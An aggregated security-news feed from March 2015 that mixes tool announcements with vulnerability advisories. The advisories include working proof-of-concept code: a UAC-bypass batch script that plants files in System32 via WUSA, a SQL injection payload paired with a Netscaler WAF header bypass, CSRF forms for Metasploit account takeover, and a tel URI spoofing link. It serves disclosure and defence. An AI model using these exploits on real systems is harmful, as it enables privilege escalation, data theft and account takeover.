Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Paper: Pydgin: Generating Fast Instruction Set Simulators from Simple Architecture Descriptions with Meta-Tracing JIT Compilers

March 13, 2015, 11:55 am
$
0
0
Abstract—Instruction set simulators (ISSs) remain an essential
tool for the rapid exploration and evaluation of instruction set extensions
in both academia and industry. Due to their importance
in both hardware and software design, modern ISSs must balance
a tension between developer productivity and high-performance
simulation. Productivity requirements have led to “ADL-driven”
toolflows that automatically generate ISSs from high-level architectural
description languages (ADLs). Meanwhile, performance
requirements have prompted ISSs to incorporate increasingly
complicated dynamic binary translation (DBT) techniques.
Construction of frameworks capable of providing both the productivity
benefits of ADL-generated simulators and the performance
benefits of DBT remains a significant challenge.
We introduce Pydgin, a new approach to ISS construction that
addresses the multiple challenges of designing, implementing, and
maintaining ADL-generated DBT-ISSs. Pydgin uses a Pythonbased,
embedded-ADL to succinctly describe instruction behavior
as directly executable “pseudocode”. These Pydgin ADL descriptions
are used to automatically generate high-performance DBTISSs
by creatively adapting an existing meta-tracing JIT compilation
framework designed for general-purpose dynamic programming
languages. We demonstrate the capabilities of Pydgin by implementing
ISSs for two instruction sets and show that Pydgin provides
concise, flexible ISA descriptions while also generating simulators
with performance comparable to hand-coded DBT-ISSs.

more here.........http://www.csl.cornell.edu/~cbatten/pdfs/lockhart-pydgin-ispass2015.pdf
Search

netool.sh V4.4

March 14, 2015, 6:37 am
$
0
0
Netool its a toolkit written using 'bash, python, ruby' that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. this toolkit makes it easy tasks such as SNIFFING tcp/udp traffic, Man-In-The-Middle attacks, SSL-sniff, DNS-spoofing, D0S attacks in wan/lan networks, TCP/UDP packet manipulation using etter-filters, and gives you the ability to capture pictures of target webbrowser surfing (driftnet), also uses macchanger to decoy scans changing the mac address.

more here.......http://sourceforge.net/projects/netoolsh/

TestTrack- open source defect tracker

March 14, 2015, 6:40 am
$
0
0
TestTrack is a tool created by the Security Engineering team at Rackspace to track testing efforts. It attempts to streamline the testing process by offering features such as templating, report generation, metrics, and baseline self-service tools. Though it was designed with security folks in mind, there is nothing keeping QA/QE testers, or any other testers for that matter, from using it productively.

more here.........https://github.com/rackerlabs/django-TestTrack

Row hammer detection is possible

March 14, 2015, 6:41 am
$
0
0
First off detection isn't fixing, but it's a good step in that direction and I'm growing continually more confident in my claim that it probably is fixable as I work with this. Anyway following the original idea send me deep into writing drivers and I quickly began to think that modifying my method slightly would bring detection and that writing this up would give me a lot of confirmation ahead of time for my original idea which I continue to think is superior, though significantly more technically complicated to write a proof of concept for. And I seriously need a break from doing my day job first and then come home and do a lot of hours row hammering.

more here.......http://dreamsofastone.blogspot.com/

Wig

March 14, 2015, 9:09 am
$
0
0
wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications.

The application fingerprinting is based on checksums and string matching of known files for different versions of CMSes. This results in a score being calculated for each detected CMS and its versions. Each detected CMS is displayed along with the most probable version(s) of it. The score calculation is based on weights and the amount of "hits" for a given checksum.

wig also tries to guess the operating system on the server based on the 'server' and 'x-powered-by' headers. A database containing known header values for different operating systems is included in wig, which allows wig to guess Microsoft Windows versions and Linux distribution and version.

more here.........https://github.com/jekyc/wig

Quttera fails and spews false positives everywhere

March 14, 2015, 11:55 am
$
0
0
By chance, I found out that my blog had been blacklisted by Quttera. No big deal, because it happens from time-to-time due to the nature of the content on the site. But I discovered that it isn't just my blog, but Quttera also block industry-leading sites such as Cisco, VMWare, Sophos, MITRE, AVG and Phishtank.

more here.......http://blog.dynamoo.com/2015/03/quttera-fails-and-spews-false-positives.html

Analyzing obfuscated VBA macros to extract C2 IP/URLs irregardless of runtime behavior

March 14, 2015, 5:37 pm
$
0
0
Lately, we have been seeing quite a lot of Office documents (or XML files with embedded Office documents, etc.) that have embedded VBA macros on our malware analysis service, which try to drop Dridex or similar. Internally, we use olevba (thanks for this great tool to Didier Stevens, by the way!) to extract the VBA macro source code. Sometimes though, the Word file does not "trigger" (as it might include some VM detection code, requirement incompatibilities, etc.) so that in order to extract something useful like a C2 IP/URL nevertheless, we are left with static analysis techniques and an often heavily obfuscated macro source.

more here..........http://payload-security.blogspot.de/2015/03/simplying-obfuscated-vba-macro-source.html

ECFS

March 15, 2015, 1:18 am
$
0
0
ECFS is an extension to the existing ELF core file format in Linux. Its job is to intercept the Linux core-dump handler, catch the core-dump before it is written to disk, and carefully reconstruct it into an ecfs-core file. An ecfs-core file is backwards compatible with regular core files but has been extended in such a way that they boast prolific amounts of data useful for process forensics analysis. An ecfs-file is not limited to just ELF program headers, but also contains many section headers as well as fully reconstructed relocation and symbol tables that reflect the state of code and data in runtime. ecfs-core files are also extremely straight forward to parse, moreso when using the complementary libecfs C library (Python bindings are a work in progress).

more here............https://github.com/elfmaster/ecfs
Search

Paper: Converting OpenBSD to PIE

March 15, 2015, 6:27 am
$
0
0
ABSTRACT
Position-independent executables (PIEs) are the last step on the journey to a fully randomised address space on OpenBSD, with the goal of providing improved defense against return-oriented programming. This paper details the measures undertaken to successfully make this conversion on a broad, system-wide scale. It also provides a perspective on both the future of practically deployed ROP mitigations and the prevalence of such features (including PIE) on other operating systems, such as *BSD, Linux and Windows.

more here.............http://www.openbsd.org/papers/asiabsdcon2015-pie-paper.pdf

Reverse_HTTPS_Bot 0.8- Inclusive link to article titled "HTTPS Command and Control"

March 15, 2015, 8:39 am
$
0
0
A python based https remote access trojan for penetration testing here.......https://github.com/ahhh/Reverse_HTTPS_Bot

OpenReil- Open source library that implements translator and tools for REIL (Reverse Engineering Intermediate Language)

March 15, 2015, 12:39 pm
$
0
0
REIL was initially developed by Zynamics as part of their BinNavi framework, proprietary code analysis software written in Java. However, after Zynamics was acquired by Google they abandoned BinNavi, so, I decided to develop my own implementation of REIL.

more here..........https://github.com/Cr4sh/openreil

Defense in depth -- the Microsoft way (part 31): UAC is for binary planting

March 16, 2015, 3:05 am
$
0
0
Hi @ll,

the exploit shown here should be well-known to every
Windows administrator, developer or QA engineer.

In Microsoft's own terms it doesn't qualify as security
vulnerability since UAC is a security feature, not a
security boundary.


Preconditions:

* a user running as "protected Administrator" on Windows 7
  and newer with standard UAC settings.

  JFTR: this is the default for "out-of-the-box" installations
        and typically almost never changed!

* some executables in directory %SystemRoot%\, but not in
  directory %SystemRoot%\System32\ (or %SystemRoot%\SysWoW64\);

  JFTR: REGEDIT.EXE is one of these executables, and it has a
        manifest which specifies
        <requestedExecutionLevel level="highestAvailable">,
        so users running as "protected Administrator" are
        accustomed to the UAC prompt when they start REGEDIT.EXE
        and will most probably acknowledge the privilege elevation.

  Exploit (to be run as a batch script):

  for %%! in ("%SystemRoot%\*.exe" "%SystemRoot%\*.dll") do call :PLANT "%%~nx!"
  exit /b
  :PLANT
  if exist "%SystemRoot%\System32\%~1" goto :EOF
  copy NUL: "%TEMP%\%~1"
  "%SystemRoot%\System32\makecab.exe" "%TEMP%\%~1" "%TEMP%\dummy.cab"
  "%SystemRoot%\System32\wusa.exe" "%TEMP%\dummy.cab" /extract:"%SystemRoot%\System32"
  if /I "%~x1" == ".exe" "%~1" /?


  WUSA.EXE is one of the about 70 Microsoft programs which are
  UAC-autoelevated since Windows 7, so the user doesn't need to
  answer the UAC prompt when the batch script plants a file in
  the directory "%SystemRoot%\System32\"


Mitigations:

* set the UAC control to "ask always" (as it was in Windows Vista)

* remove the user accounts created during setup from the
  "Administrators" group and place them in the "Users" group, i.e.
  demote these accounts from "Administrator" to "Standard user".

  Start->Run "control.exe userpasswords2" alias
  "rundll32.exe netplwiz.dll,UsersRunDll" allows this operation!

  JFTR: don't forget to enable the builtin "Administrator" account.

  Cf. <http://windows.microsoft.com/en-us/windows/user-accounts-faq>

| There are three types of accounts. Each type gives you a different
| level of control over the PC:
| * Administrator accounts provide the most control over a PC, and
|   should be used sparingly. You probably created this type of
|   account when you first started using your PC.
| * Standard accounts are for everyday use. If you're setting up
|   accounts for other people on your PC, it's a good idea to give
|   them standard accounts.


stay tuned
Stefan Kanthak

Interesting FBI biography on red-teaming doc

March 16, 2015, 3:12 am
$
0
0
Some titles with pdf links include "“Facing Your Flaws: The red team probes the network for a company to identify possible vulnerabilities and design flaws,”, “Reflections from a Red Team Leader”,  Effectiveness of Using Red-Teams to Identify Maritime Security
Vulnerabilities to Terrorist Attack and more here.......http://fbilibrary.fbiacademy.edu/bibliographies/redteaming.pdf

Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution

March 16, 2015, 3:13 am
$
0
0
Document Title:
============
Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution

Release Date:
===========
12 Mar 2015

Product & Service Introduction:
========================
Citrix NetScaler AppFirewall is a comprehensive application security solution that blocks known and unknown attacks targeting web and web services applications.

Abstract Advisory Information:
=======================
BGA Security Team discovered an HTTP Header Pollution
vulnerability in Citrix Netscaler NS10.5 (other versions may be vulnerable)

Vulnerability Disclosure Timeline:
=========================
2 Feb 2015    Bug reported to the vendor.
4 Feb 2015    Vendor returned with a case ID.
5 Feb 2015    Detailed info/config given.
12 Feb 2015    Asked about the case.
16 Feb 2015    Vendor returned "investigating ..."
6 Mar 2015    Asked about the case.
6 Mar 2015    Vendor has validated the issue.
12 Mar 2015    There aren't any fix addressing the issue.

Discovery Status:
=============
Published

Affected Product(s):
===============
Citrix Systems, Inc.
Product: Citrix Netscaler NS10.5 (other versions may be vulnerable)

Exploitation Technique:
==================
Remote, Unauthenticated


Severity Level:
===========
High

Technical Details & Description:
========================
It is possible to bypass Netscaler WAF using a method which may be called HTTP Header Pollution. The setup:

    An Apache web server with default configuration on Windows (XAMPP).
    A SOAP web service which has written in PHP and vulnerable to SQL injection.
    Netscaler WAF with SQL injection rules.

First request: ‘ union select current_user,2# - Netscaler blocks it.

Second request: The same content and an additional HTTP header which is “Content-Type: application/octet-stream”. - It bypasses the WAF but the web server misinterprets it.

Third request: The same content and two additional HTTP headers which are “Content-Type: application/octet-stream” and “Content-Type: text/xml” in that order. The request is able to bypass the WAF and the web server runs it.


Proof of Concept (PoC):
==================
Proof of Concept

Request:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
          <string>’ union select current_user, 2#</string>

    </soapenv:Body>
</soapenv:Envelope>

Response:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
   <soap:Body>
      <return xsi:type=“xsd:string”> Name: root@localhost </return>
   </soap:Body>
</soap:Envelope>


Solution Fix & Patch:
================
12 Mar 2015    There aren't any fix addressing the issue.

Security Risk:
==========
The risk of the vulnerability above estimated as high.

Credits & Authors:
==============
BGA Bilgi Güvenliği - Onur ALANBEL

Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all  warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.

Domain:    www.bga.com.tr
Social:        twitter.com/bgasecurity
Contact:    bilgi@bga.com.tr

Copyright © 2015 | BGA

Metasploit Project initial User Creation CSRF

March 16, 2015, 3:14 am
$
0
0
# Exploit Title: Metasploit Project initial User Creation CSRF
# Google Dork: N/A
# Date: 14-2-2015
# Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh)
# Vendor Homepage: http://www.metasploit.com/
# Software Link:
http://www.rapid7.com/products/metasploit/editions-and-features.jsp
# Version: Free/Pro < 4.11.1 (Update 2015021901)
# Tested on: All OS
# CVE : N/A

Vulnerability:
Cross Site Request Forgery - (CSRF)

Info:
http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

More Details:
After doing some research, i have found that the anti csrf token
"authenticity_token" value is not validated from the local server side
which will result in a more csrf attack scenario around the whole local
metasploit project.

Affected URL(s)/PoC Code(s):
-Change Local Metasploit Project User Settings
<html>
<body>
<form action="https://127.0.0.1:3790/users/1" method="POST">
<input type="hidden" name="utf8" value="â&#156;&#147;" />
<input type="hidden" name="&#95;method" value="put" />
<input type="hidden" name="authenticity&#95;token" value="" />
<input type="hidden" name="user&#91;fullname&#93;" value="Attacker" />
<input type="hidden" name="user&#91;email&#93;" value="EMAIL" />
<input type="hidden" name="user&#91;company&#93;" value="COMPANY" />
<input type="hidden" name="user&#91;time&#95;zone&#93;" value="Cairo" />
<input type="hidden" name="commit" value="Save&#32;Settings" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

-Full Local Metasploit Project Account Takeover before setting up the first
user settings
<html>
<body>
<form action="https://127.0.0.1:3790/users" method="POST">
<input type="hidden" name="utf8" value="â&#156;&#147;" />
<input type="hidden" name="authenticity&#95;token" value="" />
<input type="hidden" name="user&#91;username&#93;" value="Username" />
<input type="hidden" name="user&#91;password&#93;" value="PASSWORD" />
<input type="hidden" name="user&#91;password&#95;confirmation&#93;"
value="PASSWORD" />
<input type="hidden" name="user&#91;fullname&#93;" value="FUll_Name" />
<input type="hidden" name="user&#91;email&#93;" value="EMAIL" />
<input type="hidden" name="user&#91;company&#93;" value="COMPANY" />
<input type="hidden" name="user&#91;time&#95;zone&#93;" value="Cairo" />
<input type="hidden" name="commit" value="Create&#32;Account" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>


More Details/Impact:
-Change Local Metasploit Project User Settings
-Full Local Metasploit Project Account Takeover before setting up the first
user settings

Report Timeline:
[-] 14/02/2015: Reported to Rapid7 Security Team
[-] 14/02/2015: Initial Reply from HD Moore acknowledging the vulnerability
[-] 17/02/2015: Reply from "Eray Yilmaz" about the Operation and public
disclosure rules
[-] 20/02/2015: Reply from "Eray Yilmaz" about releasing a patch for the
vulnerability in place, Fixed in Update 4.11.1 (Update 2015021901),
https://community.rapid7.com/docs/DOC-3010
[-] 16/03/2015: Public Disclosure

Thanks

--
*Best Regards**,**,*


*Mohamed Abdelbaset Elnoby*Guru Programmer, Information Security Evangelist
& Bug Bounty Hunter.
LinkedIn
<https://www.linkedin.com/in/symbiansymoh>Curriculum Vitae
<http://goo.gl/cNrVpL>
<https://www.linkedin.com/in/symbiansymoh>Facebook
<https://fb.com/symbiansymoh>Twitter
<https://twitter.com/symbiansymoh>
Search

Jolla Phone tel URI Spoofing

March 16, 2015, 3:19 am
$
0
0
______________________________________________________________________
-------------------------- NSOADV-2015-001 ---------------------------

                     Jolla Phone tel URI Spoofing
______________________________________________________________________
______________________________________________________________________

                               111101111
                        11111 00110 00110001111
                   111111 01 01 1 11111011111111
                11111  0 11 01 0 11 1 1  111011001
             11111111101 1 11 0110111  1    1111101111
           1001  0 1 10 11 0 10 11 1111111  1 111 111001
         111111111 0 10 1111 0 11 11 111111111 1 1101 10
        00111 0 0 11 00 0 1110 1 1011111111111 1111111 11  100
       10111111 0 01 0  1 1 111110 11 1111111111111  11110000011
       0111111110 0110 1110 1 0 11101111111111111011 11100  00
       01111 0 10 1110 1 011111 1 111111111111111111111101 01
       01110 0 10 111110 110 0 11101111111111111111101111101
      111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111
      111110110 10 0111110 1 0 0 1111111111111111111111111 110
    111 11111 1  1 111 1   10011 101111111111011111111 0   1100
   111 10  110 101011110010   11111111111111111111111 11 0011100
   11 10     001100     0001      111111111111111111 10 11 11110
  11110       00100      00001     10 1  1111  101010001 11111111
  11101        0  1011     10000    00100 11100        00001101 0
  0110         111011011             0110   10001        101 11110
  1011                 1             10 101   000001        01   00
   1010 1                              11001      1 1        101  10
      110101011                          0 101                 11110
            110000011
                      111
______________________________________________________________________
______________________________________________________________________

  Title:                  Jolla Phone tel URI Spoofing
  Severity:               Low
  Advisory ID:            NSOADV-2015-001
  Date Reported:          2015-01-29
  Release Date:           2015-03-13
  Author:                 Nikolas Sotiriu
  Website:                http://sotiriu.de
  Twitter:                http://twitter.com/nsoresearch
  Mail:                   nso-research at sotiriu.de
  URL:                    http://sotiriu.de/adv/NSOADV-2015-001.txt
  Vendor:                 Jolla (https://www.jolla.com/)
  Affected Products:      Jolla Phone
  Affected Versions:      <= Sailfish OS 1.1.1.27 (Vaarainjärvi)
  Remote Exploitable:     Yes
  Patch Status:           Vendor released a patch (See Solution)
  Discovered by:          Nikolas Sotiriu



Description:
============

The Sailfish OS of the Jolla Phone contains a vulnerability that allows
to spoof the phone number, passed by a tel URI through an A HREF of a
website with some spaces (HTML &#32;).

This could be used to trick a victim to dial a premium-rate telephone
number, for example.



Proof of Concept:
=================

<a href="tel:0000000000[25xSpaces]Spoofed Text[38Spaces]aaaaa">Call</a>

Test Site http://sotiriu.de/demos/callspoof.html



Solution:
=========

Install Version 1.1.2.16 (Yliaavanlampi)

https://together.jolla.com/question/82037/release-notes-upgrade-112-
yliaavanlampi-early-access/



Disclosure Timeline:
====================

2015-01-28: Asked for a PGP Key (security@jolla.com)
2015-01-29: Got the PGP Key
2015-01-29: Sent vulnerability information to vendor
2015-01-29: Feedback that the vendor is looking into the problem
2015-01-30: Got detailed information about the patch process and
            timeline
2015-02-19: Got an E-Mail that the patched version is released
2015-03-13: Release of this advisory

A local application could cause a denial-of-service to the audio_policy app in Android

March 16, 2015, 3:20 am
$
0
0
#############################################################################
#
#   QIHU 360 SOFTWARE CO. LIMITED http://www.360safe.com/
#
#############################################################################
#
# CVE ID:   CVE-2015-1525
# Product:   Android
# Vendor:   Google
# Subject:  A local application could cause a denial-of-service to the
audio_policy app
# Effect:  cause a denial of service
# Author:  Guang Gong
# Date:     March 13th 2015
#
#############################################################################


Introduction
------------


Because of not checking null point in the
AudioPolicyManagerBase::getDeviceConnectionState function in
hardware/libhardware_legacy/audio/AudioPolicyManagerBase.cpp in Android
below 5.0 allow attackers to cause a denial of service to the audio_policy
app include mediaserver

Affected Android version
----------
all versions below Lollipop 5.0

Patches
-------
Android Bug id 18262893
https://android.googlesource.com/platform/hardware/libhardware_legacy/+/2d2ea50df16fc1a04f1ebf8772c65c56e4f5ecfa


Description
-----------
The vulnerable code is as follows.

http://androidxref.com/4.4.4_r1/xref/hardware/libhardware_legacy/audio/AudioPolicyManagerBase.cpp#251

247AudioSystem::device_connection_state
AudioPolicyManagerBase::getDeviceConnectionState(audio_devices_t device,
248                                               const char
*device_address)
249{
250 AudioSystem::device_connection_state state =
AudioSystem::DEVICE_STATE_UNAVAILABLE;
251 String8 address = String8(device_address);
--------------------------------->
should have checked if device_address is NULL
252 if (audio_is_output_device(device)) {
253     if (device & mAvailableOutputDevices) {
254         if (audio_is_a2dp_device(device) &&
255             (!mHasA2dp || (address != "" && mA2dpDeviceAddress !=
address))) {
256             return state;
257         }


Attack vector
-------------
A local application could cause a denial-of-service to the audio_policy app
include mediaserver

the crash Log is as follows:
85320 --------- beginning of crash
85321 F/libc    (18680): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x0
in tid 19486 (Binder_1)
85322 I/        (22751): fuzzing service:media.audio_policy 3:3
85323 I/DEBUG   (  180): *** *** *** *** *** *** *** *** *** *** *** ***
*** *** *** ***
85324 I/DEBUG   (  180): Build fingerprint:
'Android/aosp_hammerhead/hammerhead:4.4.3.43.43.43/AOSP/ggong10171501:userdebug/test-keys'
85325 I/DEBUG   (  180): Revision: '11'
85326 I/DEBUG   (  180): ABI: 'arm'
85327 I/DEBUG   (  180): pid: 18680, tid: 19486, name: Binder_1  >>>
/system/bin/mediaserver <<<
85328 I/DEBUG   (  180): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault
addr 0x0
85329 W/NativeCrashListener(19346): Couldn't find ProcessRecord for pid
18680
85330 I/DEBUG   (  180):     r0 00000000  r1 00000000  r2 00000000  r3
00000000
85331 E/DEBUG   (  180): AM write failure (32 / Broken pipe)
85332 I/DEBUG   (  180):     r4 b4afdb0c  r5 00000000  r6 b4afdb0c  r7
00000002
85333 I/DEBUG   (  180):     r8 b4afdc78  r9 55991c07  sl 000048f8  fp
b4afddb0
85334 I/DEBUG   (  180):     ip b6e2cf4c  sp b4afdaf8  lr b6e25651  pc
b6ee1dd0  cpsr 600e0030
85335 I/DEBUG   (  180):
85336 I/DEBUG   (  180): backtrace:
85337 I/DEBUG   (  180):     #00 pc 00010dd0  /system/lib/libc.so
(strlen+83)
85338 I/DEBUG   (  180):     #01 pc 0000d64d  /system/lib/libutils.so
(android::String8::String8(char const*)+8)
85339 I/DEBUG   (  180):     #02 pc 00009011  /system/lib/hw/
audio_policy.default.so
(android_audio_legacy::AudioPolicyManagerBase::getDeviceConnectionState(unsigned
int, char const*)+12)
85340 I/DEBUG   (  180):     #03 pc 0000dfed  /system/lib/hw/
audio_policy.default.so
85341 I/DEBUG   (  180):     #04 pc 00023145  /system/lib/libaudioflinger.so
85342 I/DEBUG   (  180):     #05 pc 00056301  /system/lib/libmedia.so
(android::BnAudioPolicyService::onTransact(unsigned int, android::Parcel
const&, android::Parcel*, unsigned int)+1056)
85343 I/DEBUG   (  180):     #06 pc 000167a5  /system/lib/libbinder.so
(android::BBinder::transact(unsigned int, android::Parcel const&,
android::Parcel*, unsigned int)+60)
85344 I/DEBUG   (  180):     #07 pc 0001aea3  /system/lib/libbinder.so
(android::IPCThreadState::executeCommand(int)+562)
85345 I/DEBUG   (  180):     #08 pc 0001afbf  /system/lib/libbinder.so
(android::IPCThreadState::getAndExecuteCommand()+38)
85346 I/DEBUG   (  180):     #09 pc 0001b001  /system/lib/libbinder.so
(android::IPCThreadState::joinThreadPool(bool)+48)
85347 I/DEBUG   (  180):     #10 pc 0001ee93  /system/lib/libbinder.so
85348 I/DEBUG   (  180):     #11 pc 0000e97d  /system/lib/libutils.so
(android::Thread::_threadLoop(void*)+112)
85349 I/DEBUG   (  180):     #12 pc 0000e505  /system/lib/libutils.so
85350 I/DEBUG   (  180):     #13 pc 00013133  /system/lib/libc.so
(__pthread_start(void*)+30)
85351 I/DEBUG   (  180):     #14 pc 0001120b  /system/lib/libc.so
(__start_thread+6)

Milestones
----------

Date                 Comment                            Sender
05/11/2014     Initial Report of CVE-2015-1525          Qihoo
07/11/2014     Sent the Android Bug ID 18262893         Google
27/01/2015     Sent the CVE-ID                          Google

VMCloak

March 16, 2015, 3:23 am
$
0
0
VMCloak is a tool to fully create and prepare Virtual Machines that can be used by Cuckoo Sandbox. In order to create a new Virtual Machine one should prepare a few configuration values that will be used later on by the tool.

more here.......https://github.com/jbremer/vmcloak

Drone Forensics – An Overview

March 16, 2015, 3:25 am
$
0
0
[This is the first in a series of posts about the forensic analysis of drones leading up to presentations at BSides NOLO and SANS DFIR Summit in Austin.] here.......https://integriography.wordpress.com/2015/03/15/drone-forensics-an-overview/

CodeGate General CTF 2015: good-crypto

March 16, 2015, 5:10 am
$
0
0
Binary : http://binary.grayhash.com/bd24de5d345c0d1da274fcd7d9a2b244/file.xz We recently intercepted some kind of encrypted traffic, can you help us recover the password?

Update: Due to a crappy javascript programmer there’s one line of code missing, but I’m sure you can figure out which one

more here..........http://vnsecurity.net/ctf%20-%20clgt%20crew/2015/03/16/codegate-good-crypto.html
Viewing all 8064 articles
Browse latest View live
Search